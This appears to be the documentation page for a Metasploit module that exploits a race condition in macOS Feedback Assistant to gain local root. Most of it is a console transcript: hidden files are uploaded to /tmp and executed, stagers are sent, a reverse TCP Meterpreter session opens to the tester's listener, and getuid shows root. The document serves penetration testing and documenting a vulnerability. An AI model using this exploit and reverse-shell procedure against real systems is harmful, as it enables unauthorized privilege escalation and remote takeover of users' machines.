## Vulnerable Application

This module exploits a race condition in MacOS' Feedback Assistant, which would lead to root local
privilege escalation.

## Scenarios

```
msf5 exploit(osx/local/feedback_assistant_root) > check
[*] The target appears to be vulnerable.
msf5 exploit(osx/local/feedback_assistant_root) > run

[*] Started reverse TCP handler on 172.16.135.1:5555 
[*] Uploading file: '/tmp/.fjbgrf'
[*] Uploading file: '/tmp/.fljhjbwe'
[*] Executing exploit '/tmp/.fljhjbwe'
[*] Transmitting first stager...(210 bytes)
[*] Exploit result:
2019-05-20 10:36:13.749 .fljhjbwe[1059:12661] [LightYear] canary: /usr/local/bin/netdiagnose
2019-05-20 10:36:13.749 .fljhjbwe[1059:12661] [LightYear] dictionary: {
    "/var/log/../../../var/folders/bg/sp3s48cs1zn3yvtgjrn6ggs00000gn/T/44E5C7D8-2B40-472C-9073-F734E924F662-1059-000002240EBB72B8/bin/root.sh" = "/tmp/../../usr/local/bin/netdiagnose";
}
2019-05-20 10:36:13.750 .fljhjbwe[1059:12661] [LightYear] Now race
2019-05-20 10:36:13.881 .fljhjbwe[1059:12661] [LightYear] Stage 1 succeed
2019-05-20 10:36:14.099 .fljhjbwe[1059:12663] [LightYear] It works!
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (808504 bytes) to 172.16.135.130
[*] Meterpreter session 2 opened (172.16.135.1:5555 -> 172.16.135.130:49256) at 2019-05-20 12:36:14 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
```
